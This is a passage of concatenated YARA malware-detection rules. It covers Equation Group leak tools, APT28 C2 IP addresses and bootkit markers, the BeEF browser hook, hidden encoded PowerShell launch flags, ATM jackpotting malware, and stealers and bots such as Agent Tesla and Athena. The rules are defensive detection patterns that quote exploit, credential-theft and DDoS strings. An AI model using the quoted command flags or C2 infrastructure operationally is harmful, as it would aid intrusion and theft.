EquationGroup_Toolset_Apr17__vtuner_vtuner_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431" hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e" strings: $s1 = "Unable to get -w hash. %x" fullword wide $s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide $s4 = "Unable to set -w provider. %x" fullword wide $op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 } $op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s1 = "Target is share name" fullword ascii $s2 = "Could not make UdpNetbios header -- bailing" fullword ascii $s3 = "Request non-NT session key" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6" hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii $s1 = "WsaErrorTooManyProcesses" fullword ascii $s2 = "NtErrorMoreProcessingRequired" fullword ascii $s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii $s4 = "ServerErrorBadNamePassword" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) or 1 of ($x*) ) } rule EquationGroup_Toolset_Apr17__SendCFTrigger_SendPKTrigger_6 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748" hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $s4 = "* Failed to connect to destination - %u" fullword wide $s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__AddResource { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0" hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff" strings: $s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii $s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii $s3 = "Unable to get path for target binary." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ESKE_RPC2_8 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s4 = "Fragment: Packet too small to contain RPC header" fullword ascii $s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 700KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__LSADUMP_Lp_ModifyPrivilege_Lp_PacketScan_Lp_put_Lp_RemoteExecute_Lp_Windows_Lp_wmi_Lp_9 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194" hash2 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48" hash3 = "2d963529e6db733c5b74db1894d75493507e6e40da0de2f33e301959b50f3d32" hash4 = "e9f6a84899c9a042edbbff391ca076169da1a6f6dfb61b927942fe4be3327749" hash5 = "d989d610b032c72252a2df284d0b53f63f382e305de2a18b453a0510ab6246a3" hash6 = "23d98bca1f6e2f6989d53c2f2adff996ede2c961ea189744f8ae65621003b8b1" hash7 = "d7ae24816fda190feda6a60639cf3716ea00fb63a4bd1069b8ce52d10ad8bc7f" strings: $x1 = "Injection Lib - " wide $x2 = "LSADUMP - - ERROR" wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_10 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" strings: $x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii $x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii $s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "Target is vulnerable" fullword ascii $x2 = "Target is NOT vulnerable" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RideArea2_12 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e" strings: $x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_13 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" strings: $x1 = "Skip call to PackageRideArea(). Payload has already been packaged. Options -x and -q ignored." fullword ascii $s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 600KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__NameProbe_SMBTOUCH_14 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597" hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii $s2 = "<\\\\__MSBROWSE__> G" fullword ascii $s3 = "<IRISNAMESERVER>" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $s8 = "Binding to RPC Interface %s over named pipe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_16 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii $x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $s6 = "Sending Implant Payload (%d-bytes)" fullword ascii $s7 = "ERROR: Encoder failed on exploit payload" fullword ascii $s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii $s2 = "Target did not respond within specified amount of time" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-17 Identifier: Equation Group Tool Output Reference: Internal Research */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_scanner_output { meta: description = "Detects output generated by EQGRP scanner.exe" author = "Florian Roth" reference = "Internal Research" date = "2017-04-17" strings: $s1 = "# Scan for windows boxes" ascii fullword $s2 = "Going into send" ascii fullword $s3 = "# Does not work" ascii fullword $s4 = "You are the weakest link, goodbye" ascii fullword $s5 = "rpc Scan for RPC folks" ascii fullword condition: filesize < 1000KB and 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule COZY_FANCY_BEAR_Hunt { meta: description = "Detects Cozy Bear / Fancy Bear C2 Server IPs" author = "Florian Roth" reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" date = "2016-06-14" strings: $s1 = "185.100.84.134" ascii wide fullword $s2 = "58.49.58.58" ascii wide fullword $s3 = "218.1.98.203" ascii wide fullword $s4 = "187.33.33.8" ascii wide fullword $s5 = "185.86.148.227" ascii wide fullword $s6 = "45.32.129.185" ascii wide fullword $s7 = "23.227.196.217" ascii wide fullword condition: uint16(0) == 0x5a4d and 1 of them } rule COZY_FANCY_BEAR_pagemgr_Hunt { meta: description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report" author = "Florian Roth" reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" date = "2016-06-14" strings: $s1 = "pagemgr.exe" wide fullword condition: uint16(0) == 0x5a4d and 1 of them } rule APT_fancybear_Downdelph_magic : Bootkit{ meta: author = "Marc Salinas @Bondey_m" description = "APT28 downdelph magic string" reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download" strings: $str1 = " :3 " condition: $str1 at 0 } rule APT_fancybear_Downdelph_MBR : Bootkit{ meta: author = "Marc Salinas @Bondey_m" description = "APT28 downdelph string on MBR (get your MBR with BOOTICE on Win or #dd if=/dev/sda of=./sda.mbr bs=512 count=1" reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download" strings: $s1 = { 20 3A 33 20 } //string " :3 " condition: $s1 at 411 //posición 0x19b } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Furtim_nativeDLL { meta: description = "Detects Furtim malware - file native.dll" author = "Florian Roth" reference = "MISP 3971" date = "2016-06-13" hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948" strings: $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */ $op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 } /* Opcode */ $op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 900KB and $s1 or all of ($op*) } rule Furtim_Parent_1 { meta: description = "Detects Furtim Parent Malware" author = "Florian Roth" reference = "https://sentinelone.com/blogs/sfg-furtims-parent/" date = "2016-07-16" hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963" strings: /* RC4 encryption password */ $x1 = "dqrChZonUF" fullword ascii /* Other strings */ $s1 = "Egistec" fullword wide $s2 = "Copyright (C) 2016" fullword wide /* Op Code */ $op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 } $op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 } $op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 } condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ($s*) and all of ($op*) ) ) ) or all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* This Yara Rule is to be considered as "experimental" It reperesents a first attempt to detect BeEF hook function in memory It still requires further refinement */ /* experimental */ rule BeEF_browser_hooked { meta: description = "Yara rule related to hook.js, BeEF Browser hooking capability" author = "Pasquale Stirparo" date = "2015-10-07" hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db" strings: $s0 = "mitb.poisonAnchor" wide ascii $s1 = "this.request(this.httpproto" wide ascii $s2 = "beef.logger.get_dom_identifier" wide ascii $s3 = "return (!!window.opera" wide ascii $s4 = "history.pushState({ Be:\"EF\" }" wide ascii $s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" wide ascii $s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" wide ascii $s7 = "window.navigator.userAgent.match(/Avant TriCore/)" wide ascii $s8 = "window.navigator.userAgent.match(/Iceweasel" wide ascii $s9 = "mitb.sniff(" wide ascii $s10 = "Method XMLHttpRequest.open override" wide ascii $s11 = ".browser.hasWebSocket" wide ascii $s12 = ".mitb.poisonForm" wide ascii $s13 = "resolved=require.resolve(file,cwd||" wide ascii $s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" wide ascii $s15 = "beef.net.request" wide ascii $s16 = "uagent.search(engineOpera)" wide ascii $s17 = "mitb.sniff" wide ascii $s18 = "beef.logger.start" wide ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule GEN_PowerShell { meta: description = "Generic PowerShell Malware Rule" author = "https://github.com/interleaved" strings: $s1 = "powershell" $s2 = "-ep bypass" nocase $s3 = "-nop" nocase $s10 = "-executionpolicy bypass" nocase $s4 = "-win hidden" nocase $s5 = "-windowstyle hidden" nocase $s11 = "-w hidden" nocase /*$s6 = "-noni" fullword ascii*/ /*$s7 = "-noninteractive" fullword ascii*/ $s8 = "-enc" nocase $s9 = "-encodedcommand" nocase condition: $s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Generic_ATMPot : Generic_ATMPot { meta: description = "Generic rule for Winpot aka ATMPot" author = "xylitol@temari.fr" date = "2019-02-24" reference = "https://securelist.com/atm-robber-winpot/89611/" // May only the challenge guide you strings: $api1 = "CSCCNG" ascii wide $api2 = "CscCngOpen" ascii wide $api3 = "CscCngClose" ascii wide $string1 = "%d,%02d;" ascii wide /* 0xD: .text:004022EC FF 15 20 70 40 00 CALL DWORD PTR DS:[407020] ; cscwcng.CscCngDispense .text:004022F2 F6 C4 80 TEST AH,80 winpot: .text:004019D4 FF 15 24 60 40 00 CALL DWORD PTR DS:[406024] ; cscwcng.CscCngDispense .text:004019DA F6 C4 80 TEST AH,80 */ $hex1 = { FF 15 ?? ?? ?? ?? F6 C4 80 } /* 0xD...: 0040506E 25 31 5B 31 2D 34 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D: %1[1-4]VAL=%8[0-9] winpot: 0040404D 25 31 5B 30 2D 39 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D: %1[0-9]VAL=%8[0-9] */ $hex2 = { 25 31 5B ?? 2D ?? 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule ATM_HelloWorld : malware { meta: description = "Search strings and procedure in HelloWorld ATM Malware" author = "xylitol@temari.fr" date = "2019-01-13" strings: $api1 = "CscCngOpen" ascii wide $api2 = "CscCngClose" ascii wide $string1 = "%d,%02d;" ascii wide $string2 = "MAX_NOTES" ascii wide $hex_var1 = { FF 15 ?? ?? ?? ?? BF 00 80 00 00 85 C7 } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule Agenttesla { meta: description = "Detecting HTML strings used by Agent Tesla malware" author = "Stormshield" reference = "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/" version = "1.0" strings: $html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii $html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii $html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii $html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii $html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii condition: 3 of them } rule agenttesla_smtp_variant { meta: author = "J from THL <j@techhelplist.com> with thx to @Fumik0_ !!1!" date = "2018/2" reference1 = "https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection" reference2 = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a" reference3 = "Agent Tesla == negasteal -- @coldshell" version = 1 maltype = "Stealer" filetype = "memory" strings: $a = "type={" $b = "hwid={" $c = "time={" $d = "pcname={" $e = "logdata={" $f = "screen={" $g = "ipadd={" $h = "webcam_link={" $i = "screen_link={" $j = "site_username={" $k = "[passwords]" condition: 6 of them } rule almashreq_agent_dotnet : almashreq_agent_dotnet { meta: description = "Memory rule for a .net RAT/Agent first found with .pdb referencing almashreq" author = "J from THL <j@techhelplist.com> with thx to @malwrhunterteam !!1!" date = "2019-05-12" reference1 = "https://twitter.com/JayTHL/status/1127334608142503936" reference2 = "https://www.virustotal.com/#/file/f6e1e425650abc6c0465758edf3c089a1dde5b9f58d26a50d3b8682cc38f12c8/details" reference3 = "https://www.virustotal.com/#/file/7e4231dc2bdab53f494b84bc13c6cb99478a6405405004c649478323ed5a9071/detection" reference4 = "https://www.virustotal.com/#/file/3cbaf6ddba3869ab68baf458afb25d2c8ba623153c43708bad2f312c4663161b/detection" reference5 = "https://www.virustotal.com/#/file/0f5424614b3519a340198dd82ad0abc9711a23c3283dc25b519affe5d2959a92/detection" maltype = "agent" filetype = "memory" strings: $s01 = "WriteElementString(@\"PCName\"," wide $s02 = "WriteElementString(@\"Command\"," wide $s03 = "WriteElementStringRaw(@\"commandID\"," wide $s04 = /^Try Run$/ wide $s05 = " is running in PC :" wide $s06 = "SOAPAction: \"http://tempuri.org/Set\"" wide $s07 = "Try Run</obj><name>" wide $s08 = "Disable</obj><name>" wide $s09 = "http://tempuri.org/" wide condition: 7 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule alina { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-09" description = "Identify Alina" strings: $s1 = "Alina v1.0" $s2 = "POST" $s3 = "1[0-2])[0-9]" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule andromeda { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-03-13" description = "Identify Andromeda" strings: $config = {1c 1c 1d 03 49 47 46} $c1 = "hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst" condition: all of them } rule Worm_Gamarue { meta: author = "Centro Criptológico Nacional (CCN)" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" description = "Gamarue_Andromeda" strings: $a = { 69 E1 2A B0 2D 80 44 E3 2D 80 44 E3 2D 80 44 E3 EE 8F 1B E3 2A 80 44 E3 EE 8F 19 E3 3A 80 44 E3 2D 80 45 E3 CD 81 44 E3 0A 46 39 E3 34 80 44 E3 0A 46 29 E3 A5 80 44 E3 0A 46 2A E3 5C 80 44 E3 0A 46 36 E3 2C 80 44 E3 0A 46 3C E3 2C 80 44 E3 } condition: $a } rule andromeda_bot { meta: maltype = "Andromeda bot" author = "https://github.com/reed1713" description = "IOC looks for the creation or termination of a process associated with the Andromeda Trojan. The malware will execute the msiexec.exe within the suspicious directory. Shortly after, it creates and injects itself into the wuauctl.exe (windows update) process. It then attempts to beacon to its C2." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="AppData\\Local\\Temp\\_.net_\\msiexec.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Arkei : Arkei { meta: Author = "Fumik0_" Description = "Arkei Stealer" Date = "2018/07/10" Hash = "5632c89fe4c7c2c87b69d787bbf0a5b4cc535f1aa02699792888c60e0ef88fc5" strings: $s1 = "Arkei" wide ascii $s2 = "/server/gate" wide ascii $s3 = "/server/grubConfig" wide ascii $s4 = "\\files\\" wide ascii $s5 = "SQLite" wide ascii condition: all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule AthenaHTTP { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-09" description = "Identify Athena HTTP" strings: $s1 = "%s(%s)" $s2 = "type:on_exec" $s3 = "uid:%s" $s4 = "priv:%s" $s5 = "arch:x%s" $s6 = "gend:%s" $s7 = "cores:%i" $s8 = "ver:%s" $s9 = "net:%s" condition: all of them } rule AthenaHTTP_v2 { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Athena HTTP identification" source = "https://github.com/arbor/yara/blob/master/athena.yara" strings: $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|" $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|" $cmd1 = "filesearch.stop" $cmd2 = "rapidget" $cmd3 = "layer4." $cmd4 = "slowloris" $cmd5 = "rudy" condition: all of ($fmt_str*) and 3 of ($cmd*) } rule AthenaIRC { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Athena IRC v1.8.x, 2.x identification" source = "https://github.com/arbor/yara/blob/master/athena.yara" strings: $cmd1 = "ddos." fullword $cmd2 = "layer4." fullword $cmd3 = "war." fullword $cmd4 = "smartview" fullword $cmd5 = "ftp.upload" fullword $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped" $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]" $msg3 = "%s %s :%s FTP Upload: Failed" $msg4 = "Athena v2" $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]" // v1 strs $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable" $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds" $amsg3 = "Began flood: %i connections every %i ms to %s:%i" $amsg4 = "IPKiller>Athena" $amsg5 = "Athena=Shit!" $amsg6 = "Athena-v1" $amsg7 = "BTC wallet.dat file found" $amsg8 = "MineCraft lastlogin file found" $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot" $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" // Athena-v1.8.3 $amsg11 = "Rapid Connect/Disconnect" $amsg12 = "BTC wallet.dat found," // v1 cmds $acmd1 = ":!arme" $acmd2 = ":!openurl" $acmd3 = ":!condis" $acmd4 = ":!httpcombo" $acmd5 = ":!urlblock" $acmd6 = ":!udp" $acmd7 = ":!btcwallet" condition: (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Atmos_Malware { meta: description = "Generic Spyware.Citadel.Atmos Signature" author = "xylitol@temari.fr" reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html" date = "20/08/2016" // May only the challenge guide you strings: // Check for the presence of MZ and kutuzov license identifier $MZ = {4D 5A} $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" wide ascii // TokenSpy identifiers $TS1 = "X-TS-Rule-Name: %s" wide ascii $TS2 = "X-TS-Rule-PatternID: %u" wide ascii $TS3 = "X-TS-BotID: %s" wide ascii $TS4 = "X-TS-Domain: %s" wide ascii $TS5 = "X-TS-SessionID: %s" wide ascii $TS6 = "X-TS-Header-Cookie: %S" wide 